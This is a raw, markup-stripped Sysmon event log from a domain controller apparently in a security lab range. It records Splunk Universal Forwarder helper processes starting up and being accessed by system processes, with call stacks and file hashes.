13:38:15.922{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4947-6000-7105-000000009A01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.922{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4947-6000-7105-000000009A01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.923{08A6967A-4947-6000-7105-000000009A01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.250{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4947-6000-7005-000000009A01}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.250{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.250{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.250{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.250{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.250{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4947-6000-7005-000000009A01}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.250{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4947-6000-7005-000000009A01}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:15.251{08A6967A-4947-6000-7005-000000009A01}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.594{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4948-6000-7205-000000009A01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.594{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.594{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.594{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.594{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.594{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4948-6000-7205-000000009A01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.594{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4948-6000-7205-000000009A01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.595{08A6967A-4948-6000-7205-000000009A01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:16.079{08A6967A-4947-6000-7105-000000009A01}66366820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.657{08A6967A-4949-6000-7305-000000009A01}68166760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.500{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4949-6000-7305-000000009A01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.500{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.500{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.500{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.500{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.500{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4949-6000-7305-000000009A01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.500{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4949-6000-7305-000000009A01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:17.501{08A6967A-4949-6000-7305-000000009A01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" 